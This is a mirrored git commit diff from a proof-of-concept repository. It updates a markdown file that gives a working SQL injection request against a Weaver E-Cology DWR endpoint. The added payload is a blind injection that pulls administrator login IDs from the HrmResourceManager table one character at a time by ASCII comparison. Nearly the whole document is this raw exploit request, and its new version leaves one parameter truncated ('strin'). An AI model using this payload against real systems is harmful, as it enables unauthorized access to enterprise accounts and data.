mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Update 某微 E-Cology 某版本 SQL注入漏洞.md
This commit is contained in:
parent
070ef5f3bb
commit
faa904f1f1
@ -1,13 +1,13 @@
|
|||||||
## 某微 E-Cology 某版本 SQL注入漏洞
|
## 某微 E-Cology 某版本 SQL注入漏洞
|
||||||
```
|
```
|
||||||
POST /dwr/call/plaincall/CptDwrUtil.ifNewsCheckOutByCurrentUser.dwr HTTP/1.1
|
POST /dwr/call/plaincall/DocDwrUtil.ifNewsCheckOutByCurrentUser.dwr HTTP/1.1
|
||||||
Host: ip:port
|
Host: ip
|
||||||
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
|
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
|
||||||
Connection: close
|
Content-Length: 191
|
||||||
Content-Length: 189
|
|
||||||
Content-Type: text/plain
|
|
||||||
Accept-Encoding: gzip
|
Accept-Encoding: gzip
|
||||||
|
Connection: close
|
||||||
|
Content-Type: text/plain
|
||||||
|
|
||||||
callCount=1
|
callCount=1
|
||||||
page=
|
page=
|
||||||
httpSessionId=
|
httpSessionId=
|
||||||
@ -15,8 +15,9 @@ scriptSessionId=
|
|||||||
c0-scriptName=DocDwrUtil
|
c0-scriptName=DocDwrUtil
|
||||||
c0-methodName=ifNewsCheckOutByCurrentUser
|
c0-methodName=ifNewsCheckOutByCurrentUser
|
||||||
c0-id=0
|
c0-id=0
|
||||||
c0-param0=string:1 AND 1=1
|
c0-param0=string:1 and ascii((select substring(loginid,1,1)from HrmResourceManager))=115
|
||||||
c0-param1=string:1
|
c0-param1=strin
|
||||||
batchId=0
|
|
||||||
|
|
||||||
```
|
```
|
||||||
|

|
||||||
|
|
||||||
|
|||||||
Loading…
x
Reference in New Issue
Block a user